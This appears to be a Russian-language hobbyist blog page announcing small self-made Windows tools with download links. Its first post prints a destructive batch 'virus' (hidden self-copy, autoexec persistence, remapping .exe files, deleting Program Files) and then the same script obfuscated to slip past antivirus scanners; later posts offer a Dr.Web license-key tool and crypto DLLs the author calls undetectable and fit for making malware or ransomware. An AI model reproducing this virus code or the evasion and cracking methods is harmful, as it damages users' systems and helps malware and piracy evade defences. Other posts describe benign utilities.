batch obfuscator\ шифрование батников.

Сел за комп вот.Еще раньше видел деобфускатор батников у kaimi, решил вот тут навоять наоборот обфускатор.Что это собсно за хрень и зачем она нужна.Ну если по простому, есть батник вида:

@echo off 
echo virus loading 
date 13.09.96 
if exist c:ski.bat goto abc 
copy %0 c:ski.bat 
attrib +h c:ski.bat 
echo c:ski.bat >>autoexec.bat 
:abc 
md pridurok 
md luzer 
md durak 
md lamer 
label e: pridurok 
assoc .exe=.mp3 
del c:program files/q 
echo virus load 

(скопирован какой-то вирус с паблика,для наглядности)

а превращается он в батник вида

rem obfuscated by SBObD
set ggxjsg=a
set hoceoi=b
set uihzkj=c
set netnof=d
set swayur=e
set qfuyih=f
set klpucr=g
set pvktyh=h
set pizeyh=i
set wyawag=j
set gaxsek=k
set ixkqqn=l
set xzsbni=m
set enxxnj=n
set jmhjlz=o
set evwjoj=p
set uvgdpz=q
set ggkavs=r
set ybbhex=s
set ygwumb=t
set eqpncb=u
set gvncwi=v
set kklkqg=w
set tkedjs=x
set xzmksq=y
set jtoqia=z
%uihzkj%%ixkqqn%%ybbhex%
@%swayur%%uihzkj%%pvktyh%%jmhjlz% %jmhjlz%%qfuyih%%qfuyih% 
%swayur%%uihzkj%%pvktyh%%jmhjlz% %gvncwi%%pizeyh%%ggkavs%%eqpncb%%ybbhex% %ixkqqn%%jmhjlz%%ggxjsg%%netnof%%pizeyh%%enxxnj%%klpucr% 
%netnof%%ggxjsg%%ygwumb%%swayur% 13.09.96 
%pizeyh%%qfuyih% %swayur%%tkedjs%%pizeyh%%ybbhex%%ygwumb% %uihzkj%:%ybbhex%%gaxsek%%pizeyh%.%hoceoi%%ggxjsg%%ygwumb% %klpucr%%jmhjlz%%ygwumb%%jmhjlz% %ggxjsg%%hoceoi%%uihzkj% 
%uihzkj%%jmhjlz%%evwjoj%%xzmksq% %0 %uihzkj%:%ybbhex%%gaxsek%%pizeyh%.%hoceoi%%ggxjsg%%ygwumb% 
%ggxjsg%%ygwumb%%ygwumb%%ggkavs%%pizeyh%%hoceoi% +%pvktyh% %uihzkj%:%ybbhex%%gaxsek%%pizeyh%.%hoceoi%%ggxjsg%%ygwumb% 
%swayur%%uihzkj%%pvktyh%%jmhjlz% %uihzkj%:%ybbhex%%gaxsek%%pizeyh%.%hoceoi%%ggxjsg%%ygwumb% >>%ggxjsg%%eqpncb%%ygwumb%%jmhjlz%%swayur%%tkedjs%%swayur%%uihzkj%.%hoceoi%%ggxjsg%%ygwumb% 
:%ggxjsg%%hoceoi%%uihzkj% 
%xzsbni%%netnof% %evwjoj%%ggkavs%%pizeyh%%netnof%%eqpncb%%ggkavs%%jmhjlz%%gaxsek% 
%xzsbni%%netnof% %ixkqqn%%eqpncb%%jtoqia%%swayur%%ggkavs% 
%xzsbni%%netnof% %netnof%%eqpncb%%ggkavs%%ggxjsg%%gaxsek% 
%xzsbni%%netnof% %ixkqqn%%ggxjsg%%xzsbni%%swayur%%ggkavs% 
%ixkqqn%%ggxjsg%%hoceoi%%swayur%%ixkqqn% %swayur%: %evwjoj%%ggkavs%%pizeyh%%netnof%%eqpncb%%ggkavs%%jmhjlz%%gaxsek% 
%ggxjsg%%ybbhex%%ybbhex%%jmhjlz%%uihzkj% .%swayur%%tkedjs%%swayur%=.%xzsbni%%evwjoj%3 
%netnof%%swayur%%ixkqqn% %uihzkj%:%evwjoj%%ggkavs%%jmhjlz%%klpucr%%ggkavs%%ggxjsg%%xzsbni% %qfuyih%%pizeyh%%ixkqqn%%swayur%%ybbhex%/%uvgdpz% 
%swayur%%uihzkj%%pvktyh%%jmhjlz% %gvncwi%%pizeyh%%ggkavs%%eqpncb%%ybbhex% %ixkqqn%%jmhjlz%%ggxjsg%%netnof% 

     

Это еще скажем простая обфускация, в батник можно добавить разного рода мусора, например так рандомное присвоение строк, или кучу запутанных goto. Однако я не стал этого делать, то шо нахер надо и так пашет)

а зачем надо вот:

(этот же батник на ВТ)

хрень конечно беспонтовая, ну та пофиг я делфю не открывал сто лет уже)

качнуть мона тут: http://splashed.ucoz.ru/SBO.rar

Поддерживаются (но не обфусцируются, в виду просто невозможности это сделать) следующие символы(возможно использовать бат-сценарии)

пробел, . - = : #39 (кавычка одинарная) / \ [ ] * >< @ % 1234567890 + ~

не отрицается наличие каких то тупорылых ошибок, хз толком не проверял, пару-тройку батников работали.

Поддерживается только нижний регистр (этого должно хватить)

интерфейс драг и дроп) просто для ленивых) в папке с прогой создастся crypted.bat

исходники?-да кому они нужны)

Споки ноки)))

Купил себе эту малютку))

hash tags: bat obfuscator, шифровать батник, спрятать батник, шифровальщик батников batch obfuscator download

DrWeb key

Написал уже давно,че то ток вспомнил про откомпиленную версию.

Что то вроде установщика ключей.
работает элементарно
1)Отключаем самозащиту.

2)Делаем пошагово как на картинке

После сообщения о успехе включаем самозащиту.имеем новый ключ.

Писана тулза на ассемблере.имеет весу 7561 байт.

Юзаем на здоровье.

http://splashed.ucoz.ru/DrWeb_Key_Finder.zip

dll export

навоял не большую прогу для определения функций экспортируемых длл-кой

скачать http://splashed.ucoz.ru/DLL_export.rar
Как узнать сколько флагов имеет функция?
Берем дизасм (иду,дасм)-дизассемблим dll ищем в листинге имя функции полученное в проге,смотрим сколько идет push-eй перед call- ом. это и есть кол-во аргументов.
как узнать возвращаемое значение?
проделываем тоже самое,после вызова функции идет retn.простой пример:
retn 4
значит возврат в хексе 4\dword=1 если функция выполняется успешно-возвращаемое значение 1 (или не 0)

Накатал не большую длл. удаляет файл методом Гутмана.
скачать http://splashed.ucoz.ru/Erase.dll
Как вызывать:
импортируем по имени Erase.
Процедура имеет один флаг fn:string; имя удаляемого файла.
Про статическую или динамическую подгрузку  можно найти в сети.

конвертор текста.
пока есть:
urlencode\decode
hex-text\text-hex
text-base64\base64-text
предлагайте для универсальности что еще добавить.сам еще склоняюсь к md5 и sha.
http://splashed.ucoz.ru/Tconvert.rar

+ text to MD5
+ rus to lat

Набросал на скорую руку.Всех с наступающим!удачно сдать сессию,у кого она идет.
http://splashed.ucoz.ru/let_it_snow.zip

частенько на выездах приходится иметь дело с подменой либо вообще удалением хостса,в 7 (да и в других) проделывать все рутинные манипуляции с блокнотом и шарить по папкам в хп мне надоело,по этому я навоял махонькую,простенькую прогу размером в 2137 байт для коррекции хостса.

скачать http://splashed.ucoz.ru/hosts_restore.zip

Новая версия Assembler Editor 2.09 готова!

Небольшая украшалка для рабочего стола.
Прога позволяет заменять скучные виндовские обои на другие скучные обои по интервалу времени.Запиливание и выпиливание в\из автозапуск(а).
Сворачивание в трэй.Фильтры bmp, jpeg, JPG. Удобный переход по папкам.Исключения проработаны.Обои заполняются на весь экран.
скриншот:
скочать http://splashed.ucoz.ru/Wallpapers_Changer.zip
Перепилина прога,теперь:
1)Ставит рандомную картинку из папки
2)после автозагрузки каталог выбранный ранее уже сразу отображается, остается лишь включить программу.

Dll crypt

Хочу представить Вам две dll-ки для крипта.
1)Длл которая содержит три простых и в тоже время часто используемых в легкой защите алгоритма- ROR, ROL, XOR.
Библиотека написана полностью на ассемблере.
Вес библиотеки: 2048 байт.

2)Библиотека с более сложным алгоритмом,некогда написанная гру3ином(CSCA1) (с)http://pblog.ru/

Модификации которые я внес не значительны (в коде):
1)Размер библиотеки уменьшен
2)Полностью переписана на макро ассемблер (С фасма)
3)Немного внес свою лепту в код
4)Не палится НИЧЕМ, так что псевдо-хацкеры снова могут юзать ее для своих грязных дел(вспомните ситуацию когда вирус шифровал файлы и вымогал $)
так что своего рода приват
Размер также составляет 2 кб.

Скачать dll-ки http://splashed.ucoz.ru/DLL.zip

Как юзать:
подгружаем длл используя LoadLibrary,получаем адрес функции GetProcAddress
вызываем фун-ю и выгружаем длл-ку .









на примере показано шифрование ROR .
для XOR перед eax перед вызовом функции добавляется параметр ключа шифрования.
то есть дописуем есчо так push 66d
где 66d ключ шифрования.
ключ не может быть больше 0FF/
пример использования второй либы есть в паблике(только вместо вызова csca1 вызывайте crypt).
Юзать можно для шифрования строк,доков...для создание мальварей, внутренней защиты строк (кракми и т.п.)и т.п.

Shutdown таймер

Давно нужна была программа которая сама выключала бы комп.И вот я ее написал.
Скачать тута http://splashed.ucoz.ru/Shutdown_Timer.zip
03.09.11 Исправлены мелкие баги и недочеты.

UPX GUI

Завершил свой gui для компрессора exe/dll файлов UPX.
Ссылка-скачать.В архиве  прилагаются исходники, gui написан на masm'e,имеет размер 6656 байт
в чистом виде и 2853 байт после FSG.

Assembler editor

Мини среда программирования для ассемблера,конкретно для синтаксисa TASM и MASM.
Программа постоянно совершенствуется,так что обновления теперь будут выкладываться здесь.
Скачать можно здесь http://forum.antichat.ru/thread261755-assembler+editor.html
Тема на античате http://forum.antichat.ru/thread261755-assembler+editor.html
Полное описание можно прочесть там.
http://splashed.ucoz.ru/Setup.zip
апдейт!2.09
16.10.11